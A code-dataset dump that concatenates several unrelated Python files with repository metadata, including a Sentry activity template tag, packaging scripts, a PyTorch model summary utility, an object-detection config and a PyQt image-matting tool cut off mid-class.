] | 2 | 2019-12-29T19:58:38.000Z | 2021-12-17T09:16:24.000Z | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
] | null | null | null | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
] | 1 | 2021-12-17T06:36:12.000Z | 2021-12-17T06:36:12.000Z | import zipfile, os
path = '/Users/rileyhales/tethys/apps/gldas/tethysapp/gldas/workspaces/user_workspaces/admin'
files = os.listdir('/Users/rileyhales/tethys/apps/gldas/tethysapp/gldas/workspaces/user_workspaces/admin')
archive = zipfile.ZipFile('/Users/rileyhales/hydroinformatics/admin.zip', mode='w')
for file in files:
archive.write(os.path.join(path, file), arcname=file)
archive.close()
| 44.222222 | 106 | 0.786432 |
5a244d0ac92cb8613f26722ad8d231dfa6688b4c | 1,908 | py | Python | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | """
sentry.templatetags.sentry_activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from django import template
from django.utils.html import escape, linebreaks
from django.utils.safestring import mark_safe
from sentry.models import Activity
from sentry.templatetags.sentry_helpers import timesince
from sentry.utils.avatar import get_gravatar_url
register = template.Library()
ACTIVITY_ACTION_STRINGS = {
Activity.NOTE: 'left a comment',
Activity.SET_RESOLVED: 'marked this event as resolved',
Activity.SET_UNRESOLVED: 'marked this event as unresolved',
Activity.SET_MUTED: 'marked this event as muted',
Activity.SET_PUBLIC: 'made this event public',
Activity.SET_PRIVATE: 'made this event private',
Activity.SET_REGRESSION: 'marked this event as a regression',
Activity.CREATE_ISSUE: u'created an issue on {provider:s} titled <a href="{location:s}">{title:s}</a>',
}
@register.filter
def render_activity(item):
if not item.group:
# not implemented
return
action_str = ACTIVITY_ACTION_STRINGS[item.type]
if item.type == Activity.CREATE_ISSUE:
action_str = action_str.format(**item.data)
output = ''
if item.user:
user = item.user
name = user.first_name or user.email
output += '<span class="avatar"><img src="%s"></span> ' % (get_gravatar_url(user.email, size=20),)
output += '<strong>%s</strong> %s' % (escape(name), action_str)
else:
output += '<span class="avatar sentry"></span> '
output += 'The system %s' % (action_str,)
output += ' <span class="sep">—</span> <span class="time">%s</span>' % (timesince(item.datetime),)
if item.type == Activity.NOTE:
output += linebreaks(item.data['body'])
return mark_safe(output)
| 32.338983 | 108 | 0.675052 |
746ff7a531d3796325de0983381e8018d0a26abb | 711 | py | Python | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 598 | 2018-09-27T12:34:08.000Z | 2022-03-17T04:15:15.000Z | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 136 | 2018-10-03T16:53:29.000Z | 2022-01-11T09:32:58.000Z | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 39 | 2018-10-09T02:20:27.000Z | 2022-03-30T09:22:16.000Z | """
Cross-process log tracing: HTTP server.
"""
from __future__ import unicode_literals
import sys
from flask import Flask, request
from eliot import to_file, Action, start_action, add_global_fields
add_global_fields(process="server")
to_file(sys.stdout)
app = Flask("server")
def divide(x, y):
with start_action(action_type="divide", x=x, y=y) as action:
result = x / y
action.add_success_fields(result=result)
return result
@app.route("/")
def main():
with Action.continue_task(task_id=request.headers["x-eliot-task-id"]):
x = int(request.args["x"])
y = int(request.args["y"])
return str(divide(x, y))
if __name__ == '__main__':
app.run()
| 20.911765 | 74 | 0.670886 |
789d384696f5e732ba82bcd5d7147de7be535031 | 814 | py | Python | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | from distutils.core import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="HW_10", # Replace with your own username
version="0.1.0",
author="Olga",
author_email="Olga@example.com",
description="Creation of packages for projects HW8 and HW9",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/CI1100/HW_10",
license= 'LICENSE.txt',
packages= ['final_project_packages', 'final_project_packages.test'],
scripts = ['bin/HW_8.py', 'bin/kmeans_iris.py'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
| 32.56 | 73 | 0.641278 |
423422d7703d8da2cb87c837c08a4c6d60bcb680 | 2,165 | py | Python | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 25 | 2015-01-26T11:37:22.000Z | 2021-04-05T17:21:05.000Z | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 1 | 2015-04-13T04:19:49.000Z | 2015-04-13T04:19:49.000Z | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 2 | 2017-05-24T13:33:17.000Z | 2019-11-14T06:24:48.000Z | '''
These are objects generated by the resource and are serialized by a media type.
'''
from hyperadmin.links import LinkCollectorMixin, ItemLinkCollectionProvider, LinkNotAvailable
class Item(LinkCollectorMixin):
'''
Represents an instance that is bound to an endpoint
'''
form_class = None
link_collector_class = ItemLinkCollectionProvider
def __init__(self, endpoint, instance, datatap=None):
self.endpoint = endpoint
self.instance = instance
self.links = self.get_link_collector()
self.datatap = datatap
@property
def state(self):
return self.endpoint.state
def get_absolute_url(self):
try:
return self.endpoint.get_item_url(self)
except LinkNotAvailable:
return '' #or do we return None?
def get_form_class(self):
if self.form_class is not None:
return self.form_class
return self.endpoint.get_item_form_class()
def get_form_kwargs(self, **kwargs):
kwargs['item'] = self
return self.endpoint.get_item_form_kwargs(**kwargs)
def get_form(self, **form_kwargs):
form_cls = self.get_form_class()
kwargs = self.get_form_kwargs(**form_kwargs)
form = form_cls(**kwargs)
return form
@property
def form(self):
"""
Mediatype uses this form to serialize the result
"""
if not hasattr(self, '_form'):
self._form = self.get_form()
return self._form
def get_prompt(self):
"""
Returns a string representing the item
"""
return self.endpoint.get_item_prompt(self)
def get_resource_items(self):
return [self]
def get_namespaces(self):
"""
Returns namespaces associated with this item
"""
return self.endpoint.get_item_namespaces(item=self)
def get_link(self, **kwargs):
return self.endpoint.get_item_link(item=self, **kwargs)
def get_outbound_link(self, **kwargs):
kwargs.setdefault('link_factor', 'LO')
return self.get_link(**kwargs)
| 28.486842 | 93 | 0.626328 |
b80b18c4fcb6fc7a2080cbd4eaf0f8b982cedea3 | 2,642 | py | Python | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 86 | 2017-11-15T18:49:50.000Z | 2022-02-01T19:37:29.000Z | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 42 | 2018-01-05T02:35:08.000Z | 2020-04-16T13:56:45.000Z | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 59 | 2017-12-10T17:22:48.000Z | 2022-02-01T19:37:31.000Z | #!/usr/bin/env python
import codecs
import os
import re
import sys
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
def find_packages():
"""adapted from IPython's setupbase.find_packages()"""
packages = []
for dir, subdirs, files in os.walk('idex'):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
if sys.version_info < (3, 3) and 'asyncio' in package and 'sdist' not in sys.argv:
# Don't install asyncio packages on old Python
# avoids issues with tools like compileall, pytest, etc.
# that get confused by presence of Python 3-only sources,
# even when they are never imported.
continue
packages.append(package)
return packages
def read(*parts):
with codecs.open(os.path.join(here, *parts), 'r') as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
def install_requires():
requires = ['requests', 'coincurve>=7.0.0', 'pycryptodome>=3.5.1,<4']
if sys.version_info > (3, 3):
requires.extend(['py_ecc', 'websockets>=4.0.0', 'aiohttp>=2.3.0', 'shortid>=0.1.2', 'rlp>=0.6'])
else:
requires.extend(['py_ecc==1.4.2', 'rlp==0.4.7'])
print("installing:{}".format(requires))
return requires
setup(
name='python-idex',
version=find_version("idex", "__init__.py"),
packages=find_packages(),
description='IDEX REST API python implementation',
long_description=read('README.rst'),
url='https://github.com/sammchardy/python-idex',
author='Sam McHardy',
license='MIT',
author_email='',
install_requires=install_requires(),
keywords='idex exchange rest api ethereum eth eos',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| 33.025 | 104 | 0.608251 |
5c4eaadc947b65e4a311d1a59df67482db0242b6 | 5,564 | py | Python | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 17 | 2021-09-07T15:23:04.000Z | 2022-01-28T15:46:54.000Z | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 18 | 2021-09-08T12:31:39.000Z | 2021-12-13T15:26:01.000Z | ganslate/utils/summary.py | ibro45/a | a90d92eaf041331cd3397f788cb60884cb0e176b | [
"BSD-3-Clause"
] | 2 | 2021-11-10T11:23:00.000Z | 2022-02-10T07:57:20.000Z | # Taken from https://github.com/sksq96/pytorch-summary/blob/master/torchsummary/torchsummary.py
# Edited:
# - returns string and doesn't print anything anymore, so that it can be used with `logging` module
# - summary_string() -> summary(), removed old summary()
# - gan_summary function that outputs summaries of each unique network architecture in GAN setup
import torch
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from collections import OrderedDict
import numpy as np
def gan_summary(gan, dataloader):
input_shape = tuple(dataloader.dataset[0]["A"].shape)
message = "\n------------------------------------------------------------------------------\n"
message += f"Input shape of an example from the dataset: {input_shape}\n"
message += f"GAN setup consists of networks: {list(gan.networks.keys())}\n"
logged_networks = []
for name, net in gan.networks.items():
if isinstance(net, DistributedDataParallel):
net = net.module
# Networks of the same network class are output only once. E.g. G_AB and G_BA, only one logged.
if str(type(net)) not in logged_networks:
message += f"\nNetwork name: {name}\n"
message += summary(net, input_shape, device=gan.device)
logged_networks.append(str(type(net)))
return message
def summary(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):
if dtypes == None:
dtypes = [torch.FloatTensor] * len(input_size)
summary_str = ''
def register_hook(module):
def hook(module, input, output):
class_name = str(module.__class__).split(".")[-1].split("'")[0]
module_idx = len(summary)
m_key = "%s-%i" % (class_name, module_idx + 1)
summary[m_key] = OrderedDict()
summary[m_key]["input_shape"] = list(input[0].size())
summary[m_key]["input_shape"][0] = batch_size
if isinstance(output, (list, tuple)):
summary[m_key]["output_shape"] = [[-1] + list(o.size())[1:] for o in output]
else:
summary[m_key]["output_shape"] = list(output.size())
summary[m_key]["output_shape"][0] = batch_size
params = 0
if hasattr(module, "weight") and hasattr(module.weight, "size"):
params += torch.prod(torch.LongTensor(list(module.weight.size())))
summary[m_key]["trainable"] = module.weight.requires_grad
if hasattr(module, "bias") and hasattr(module.bias, "size"):
params += torch.prod(torch.LongTensor(list(module.bias.size())))
summary[m_key]["nb_params"] = params
if (not isinstance(module, nn.Sequential) and not isinstance(module, nn.ModuleList)):
hooks.append(module.register_forward_hook(hook))
# multiple inputs to the network
if isinstance(input_size, tuple):
input_size = [input_size]
# batch_size of 2 for batchnorm
x = [
torch.rand(2, *in_size).type(dtype).to(device=device)
for in_size, dtype in zip(input_size, dtypes)
]
# create properties
summary = OrderedDict()
hooks = []
# register hook
model.apply(register_hook)
# make a forward pass
model(*x)
# remove these hooks
for h in hooks:
h.remove()
summary_str += "----------------------------------------------------------------" + "\n"
line_new = "{:>20} {:>25} {:>15}".format("Layer (type)", "Output Shape", "Param #")
summary_str += line_new + "\n"
summary_str += "================================================================" + "\n"
total_params = 0
total_output = 0
trainable_params = 0
for layer in summary:
# input_shape, output_shape, trainable, nb_params
line_new = "{:>20} {:>25} {:>15}".format(
layer,
str(summary[layer]["output_shape"]),
"{0:,}".format(summary[layer]["nb_params"]),
)
total_params += summary[layer]["nb_params"]
total_output += np.prod(summary[layer]["output_shape"])
if "trainable" in summary[layer]:
if summary[layer]["trainable"] == True:
trainable_params += summary[layer]["nb_params"]
summary_str += line_new + "\n"
# assume 4 bytes/number (float on cuda).
total_input_size = abs(np.prod(sum(input_size, ())) * batch_size * 4. / (1024**2.))
total_output_size = abs(2. * total_output * 4. / (1024**2.)) # x2 for gradients
total_params_size = abs(total_params * 4. / (1024**2.))
total_size = total_params_size + total_output_size + total_input_size
summary_str += "================================================================" + "\n"
summary_str += "Total params: {0:,}".format(total_params) + "\n"
summary_str += "Trainable params: {0:,}".format(trainable_params) + "\n"
summary_str += "Non-trainable params: {0:,}".format(total_params - trainable_params) + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
summary_str += "Input size (MB): %0.2f" % total_input_size + "\n"
summary_str += "Forward/backward pass size (MB): %0.2f" % total_output_size + "\n"
summary_str += "Params size (MB): %0.2f" % total_params_size + "\n"
summary_str += "Estimated Total Size (MB): %0.2f" % total_size + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
# return summary
return summary_str
| 42.473282 | 103 | 0.571891 |
d15cfb55908ce1b4e97403d6d1c56f3db60a2da3 | 194 | py | Python | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | trufimonitor/dbtemplate/stock.py | trufi-association/trufi-monitor-backend | 8974a061debe3582605a6e6ec63e4116fe7ef60b | [
"MIT"
] | null | null | null | from ..DatabaseTemplate import strategy
table = {
"label": ["varchar(50)", ""],
"amount": ["int", 0],
"value": ["int", 0],
"state": ["varchar(50)", ""]
}
strategy = Strategy.REPLACEORADD
| 17.636364 | 39 | 0.587629 |
2e283064706e79125f729291246f978923eb27a2 | 598 | py | Python | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | vst/chinese_ocr.py | ShikamaAppliances501c3/video-subtitle-translator | fc5cf0fb9d6c9a65fd819dbcccd7c9a8a5d9ca0d | [
"MIT"
] | null | null | null | try:
from PIL import Image
except ImportError:
import Image
import pytesseract
import cv2
import numpy as np
class ChineseOCR:
@staticmethod
def ocr(path) -> str:
image = cv2.imread(path)
image = ChineseOCR.netflix_manipulations(image)
# cv2.imwrite("ocr_result.png", image)
return pytesseract.image_to_string(image, lang='chi_sim')
@staticmethod
def netflix_manipulations(image):
kernel = np.ones((2, 2), np.uint8)
image = cv2.dilate(image, kernel, iterations=1)
image = cv2.bitwise_not(image)
return image | 26 | 65 | 0.665552 |
5f65ba4ac5bc35961d2c0bf238f9a2b1de75e9ad | 1,163 | py | Python | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | 3 | 2019-06-24T08:04:25.000Z | 2020-05-26T03:45:45.000Z | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | null | null | null | tests/CH4/get_rdf.py | pyflosic/pyeff | 4b76fcc4a0bfb25f9f4106567d01b5ea02db6737 | [
"Apache-2.0"
] | null | null | null | from ase.io import read
from ase.ga.utilities import get_rdf,get_nnmat
from matplotlib.pyplot import *
from ase.atoms import Atoms
import numpy as np
import glob
l = 5.0
nmax = 100
atoms = read(glob.glob('final.xyz')[0])
atoms.set_cell(np.eye(3)*l)
print atoms
up = Atoms()
up.set_cell(atoms.get_cell())
up_target = 'X'
dn = Atoms()
dn.set_cell(atoms.get_cell())
dn_target = 'He'
nuclei = Atoms()
nuclei.set_cell(atoms.get_cell())
for a in range(len(atoms)):
if atoms[a].symbol == up_target:
up.append(atoms[a])
if atoms[a].symbol == dn_target:
dn.append(atoms[a])
if atoms[a].symbol != up_target and atoms[a].symbol != dn_target:
nuclei.append(atoms[a])
data_up = get_rdf(up,l,nmax)
data_dn = get_rdf(dn,l,nmax)
data_nuclei = get_rdf(nuclei,l,nmax)
data_all = get_rdf(atoms,l,nmax)
# data_up[0]/max(data_up[0])*len(up)
# data_dn[0]/max(data_dn[0])*len(dn)
bar(data_up[1],data_up[0],label='up',width=0.02)
bar(data_dn[1],data_dn[0],label='dn',width=0.01)
bar(data_nuclei[1],data_nuclei[0],label='nuclei',width=0.02)
#bar(data_all[1],data_all[0],label='all',width=0.05)
legend()
show()
| 26.431818 | 73 | 0.671539 |
bb19aaa2119f881cde19b98a5630bcdd678d7b87 | 3,737 | py | Python | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 629 | 2018-05-29T06:33:47.000Z | 2022-03-28T09:43:35.000Z | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 118 | 2018-06-08T02:28:50.000Z | 2021-08-23T07:42:01.000Z | libs/configs/cfgs_DOTA_v3.py | khanfarhan10/R2CNN_Faster-RCNN_Tensorflow | 0bcc4209defefebd7b3644c6f4a0dcaaa6170c3f | [
"MIT"
] | 211 | 2018-05-31T02:44:34.000Z | 2022-03-03T10:48:01.000Z | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import os
import tensorflow as tf
# ------------------------------------------------
VERSION = 'FasterRCNN_20180515_DOTA_v3'
NET_NAME = 'resnet_v1_101'
ADD_BOX_IN_TENSORBOARD = True
# ---------------------------------------- System_config
ROOT_PATH = os.path.abspath('../')
print(20*"++--")
print(ROOT_PATH)
GPU_GROUP = "2"
SHOW_TRAIN_INFO_INTE = 10
SMRY_ITER = 100
SAVE_WEIGHTS_INTE = 2000
SUMMARY_PATH = ROOT_PATH + '/output/summary'
TEST_SAVE_PATH = ROOT_PATH + '/tools/test_result'
INFERENCE_IMAGE_PATH = ROOT_PATH + '/tools/inference_image'
INFERENCE_SAVE_PATH = ROOT_PATH + '/tools/inference_results'
if NET_NAME.startswith('resnet'):
weights_name = NET_NAME
elif NET_NAME.startswith('MobilenetV2'):
weights_name = 'mobilenet/mobilenet_v2_1.0_224'
else:
raise NotImplementedError
PRETRAINED_CKPT = ROOT_PATH + '/data/pretrained_weights/' + weights_name + '.ckpt'
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
EVALUATE_H_DIR = ROOT_PATH + '/output' + '/evaluate_h_result_pickle/' + VERSION
EVALUATE_R_DIR = ROOT_PATH + '/output' + '/evaluate_r_result_pickle/' + VERSION
TEST_ANNOTATION_PATH = '/mnt/USBB/gx/DOTA/DOTA_clip/val/labeltxt'
# ------------------------------------------ Train config
RESTORE_FROM_RPN = False
IS_FILTER_OUTSIDE_BOXES = True
ROTATE_NMS_USE_GPU = True
FIXED_BLOCKS = 2 # allow 0~3
RPN_LOCATION_LOSS_WEIGHT = 1 / 7
RPN_CLASSIFICATION_LOSS_WEIGHT = 2.0
FAST_RCNN_LOCATION_LOSS_WEIGHT = 4.0
FAST_RCNN_CLASSIFICATION_LOSS_WEIGHT = 2.0
RPN_SIGMA = 3.0
FASTRCNN_SIGMA = 1.0
MUTILPY_BIAS_GRADIENT = None # 2.0 # if None, will not multipy
GRADIENT_CLIPPING_BY_NORM = None # 10.0 if None, will not clip
EPSILON = 1e-5
MOMENTUM = 0.9
LR = 0.0003 # 0.0003
DECAY_STEP = [60000, 120000] # 90000, 120000
MAX_ITERATION = 1000000
# -------------------------------------------- Data_preprocess_config
DATASET_NAME = 'DOTA' # 'ship', 'spacenet', 'pascal', 'coco'
PIXEL_MEAN = [123.68, 116.779, 103.939] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
IMG_SHORT_SIDE_LEN = 800
IMG_MAX_LENGTH = 1000
CLASS_NUM = 15
# --------------------------------------------- Network_config
BATCH_SIZE = 1
INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.01)
BBOX_INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.001)
WEIGHT_DECAY = 0.0001
# ---------------------------------------------Anchor config
BASE_ANCHOR_SIZE_LIST = [256] # can be modified
ANCHOR_STRIDE = [16] # can not be modified in most situations
ANCHOR_SCALES = [0.0625, 0.125, 0.25, 0.5, 1., 2.0] # [4, 8, 16, 32]
ANCHOR_RATIOS = [1, 1 / 2, 2., 1 / 3., 3., 5., 1 / 4., 4., 1 / 5., 6., 1 / 6., 7., 1 / 7.]
ROI_SCALE_FACTORS = [10., 10., 5.0, 5.0, 5.0]
ANCHOR_SCALE_FACTORS = None
# --------------------------------------------RPN config
KERNEL_SIZE = 3
RPN_IOU_POSITIVE_THRESHOLD = 0.7
RPN_IOU_NEGATIVE_THRESHOLD = 0.3
TRAIN_RPN_CLOOBER_POSITIVES = False
RPN_MINIBATCH_SIZE = 256
RPN_POSITIVE_RATE = 0.5
RPN_NMS_IOU_THRESHOLD = 0.7
RPN_TOP_K_NMS_TRAIN = 12000
RPN_MAXIMUM_PROPOSAL_TARIN = 2000
RPN_TOP_K_NMS_TEST = 10000 # 5000
RPN_MAXIMUM_PROPOSAL_TEST = 300 # 300
# -------------------------------------------Fast-RCNN config
ROI_SIZE = 14
ROI_POOL_KERNEL_SIZE = 2
USE_DROPOUT = False
KEEP_PROB = 1.0
SHOW_SCORE_THRSHOLD = 0.5 # only show in tensorboard
FAST_RCNN_NMS_IOU_THRESHOLD = 0.1 # 0.6
FAST_RCNN_NMS_MAX_BOXES_PER_CLASS = 150
FAST_RCNN_IOU_POSITIVE_THRESHOLD = 0.4
FAST_RCNN_IOU_NEGATIVE_THRESHOLD = 0.0 # 0.1 < IOU < 0.5 is negative
FAST_RCNN_MINIBATCH_SIZE = 256 # if is -1, that is train with OHEM
FAST_RCNN_POSITIVE_RATE = 0.35
ADD_GTBOXES_TO_TRAIN = False
| 31.141667 | 100 | 0.678619 |
3132c5f2785de9dc4a67f2d9a1c808c7850ddc43 | 537 | py | Python | learning_strategies/evolution/abstracts.py | jinPrelude/simple-es | 759f3f70e641463a785a7275ba16c9db72fb29bf | [
"Apache-2.0"
] | 10 | 2020-08-16T11:43:23.000Z | 2022-01-21T23:21:52.000Z | learning_strategies/evolution/abstracts.py | jinPrelude/simple-es | 759f3f70e641463a785a7275ba16c9db72fb29bf | [
"Apache-2.0"
] | 2 | 2021-03-25T09:22:21.000Z | 2021-06-24T09:55:28.000Z | learning_strategies/evolution/abstracts.py | jinPrelude/give-life-to-agents | ebf7d89a05a8e820759a0cf80adcc9499c8425d8 | [
"Apache-2.0"
] | 2 | 2021-08-10T14:26:55.000Z | 2021-09-27T20:57:48.000Z | import os
from abc import *
class BaseESLoop(metaclass=ABCMeta):
@abstractmethod
def __init__(self):
pass
@abstractmethod
def run(self):
pass
class BaseOffspringStrategy(metaclass=ABCMeta):
@abstractmethod
def __init__(selfm):
pass
@abstractmethod
def _gen_offsprings(self):
pass
@abstractmethod
def get_elite_model(self):
pass
@abstractmethod
def init_offspring(self):
pass
@abstractmethod
def evaluate(self):
pass
| 15.342857 | 47 | 0.635009 |
87679e0d442327fe273cfdea93af1b3ef866ba7b | 349 | py | Python | backend/apps/modellog/urls.py | Huoran559/vue-element-frontend-backend | 2ab21792c314692fb9b11c6e5f1e890ffaf5cf3c | [
"MIT"
] | 15 | 2021-01-31T01:45:46.000Z | 2022-03-27T00:23:21.000Z | backend/apps/modellog/urls.py | zouv/vue-admin-django | 40e91e2ff0781dad89a3f5325514a04816406cfb | [
"MIT"
] | 10 | 2020-06-06T00:18:48.000Z | 2022-01-13T01:47:39.000Z | backend/apps/modellog/urls.py | zouv/vue-admin-django | 40e91e2ff0781dad89a3f5325514a04816406cfb | [
"MIT"
] | 4 | 2021-07-09T09:45:44.000Z | 2022-03-28T06:47:31.000Z | # -*- coding: utf-8 -*-
#author:laoseng(QQ:1572665580),feilong(hhr66@qq.com)
#create:2018-09
from rest_framework import routers
from .views import *
router = routers.DefaultRouter()
router.register(r'logsentrys', LogsEntryViewSet, base_name='logsentry')
router.register(r'models', ContentTypeViewSet, base_name='model')
urlpatterns = router.urls
| 26.846154 | 71 | 0.770774 |
5e5abbdcf1d3307a4af5029663fe058a8d3e743a | 10,277 | py | Python | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | main.py | zhen8838/ai-matting-tool | 8cb08205558ff94c3f78fa115e42b5fe2d02c0a8 | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import Qt, QCoreApplication, QThread, pyqtSignal, QDir
from waiting import WaitingDialog
from inputcolor import InputColor
import sys
import os
sys.path.insert(0, os.getcwd())
import Ui_draw
from pathlib import Path
from typing import List
from operator import add, sub
import numpy as np
import cv2
import torch
from easydict import EasyDict
import yaml
class ImageFileList(object):
def __init__(self, current_file: Path, file_list: List[Path]) -> None:
self.list = file_list
self.idx = file_list.index(current_file)
self.size = len(self.list)
def __len__(self):
self.size
def indexing(self, op, default_num) -> Path:
self.idx = op(self.idx, 1)
if self.idx < 0 or self.idx >= self.size:
self.idx = default_num
f = self.list[self.idx]
return f
def next(self) -> Path:
return self.indexing(add, 0)
def past(self) -> Path:
return self.indexing(sub, self.size - 1)
def curt(self) -> Path:
return self.indexing(lambda a, b: a, self.idx)
def np2qimg(im_np: np.ndarray) -> QImage:
h, w, channel = im_np.shape
im = QImage(im_np.data, w, h, w * channel,
QImage.Format_RGB888 if channel == 3 else QImage.Format_RGBA8888)
return im
def qimg2np(im: QImage) -> np.ndarray:
ptr = im.constBits()
h, w = im.height(), im.width()
ptr.setsize(h * w * 4)
im_np = np.frombuffer(ptr, 'uint8').reshape((h, w, 4))
return im_np
class AiMattingThread(QThread):
finished = pyqtSignal(QPixmap)
def setImage(self, im):
self.im = im
def setModel(self, model):
self.model = model
@staticmethod
def ai_matting_mask(im: np.ndarray, model: torch.nn.Module) -> np.ndarray:
""" use ai model get image mask
Args:
im (np.ndarray): image
model (torch.nn.Module): network
Returns:
np.ndarray: mask (np.bool)
"""
im = cv2.cvtColor(im.copy(), cv2.COLOR_RGB2BGR).astype('float32')
im -= np.array((104.00699, 116.66877, 122.67892), 'float32')
hw = np.array(im.shape[:2], dtype='uint32')
# resize image to multiple of 32
new_hw = (hw // 32) * 32
im = cv2.resize(im, tuple(new_hw[::-1]))
im = im.transpose((2, 0, 1))
with torch.no_grad():
ims = torch.autograd.Variable(torch.Tensor(im[None, ...]))
preds = model(ims, mode=1)
sigmod = np.squeeze(torch.sigmoid(preds).cpu().data.numpy())
if (new_hw != hw).any():
sigmod = cv2.resize(sigmod, tuple(hw[::-1]))
mask = 255 * sigmod
return mask > 1
def run(self) -> None:
mask = self.ai_matting_mask(self.im, self.model)
h, w = self.im.shape[:2]
mask_im = (mask[..., None] *
np.tile(np.reshape(
np.array([0, 128, 0, 128], dtype='uint8'),
[1, 1, 4]), [h, w, 1]))
mask_pixmap = QPixmap.fromImage(np2qimg(mask_im))
self.finished.emit(mask_pixmap)
class MyMainWindow(QMainWindow):
def setConfigDict(self, config: EasyDict):
self.config = config
def closeEvent(self, event) -> None:
with open('./config.yml', 'w') as f:
yaml.safe_dump(self.config.__dict__, f)
super().closeEvent(event)
class Ui_DrawTask(Ui_draw.Ui_MainWindow):
def setupCustom(self, MainWindow: MyMainWindow):
""" global variable """
self.MainWindow = MainWindow
self.input_list: ImageFileList = None
self.output_dir: Path = None
self.cur_path: Path = None
self.export_path: Path = None
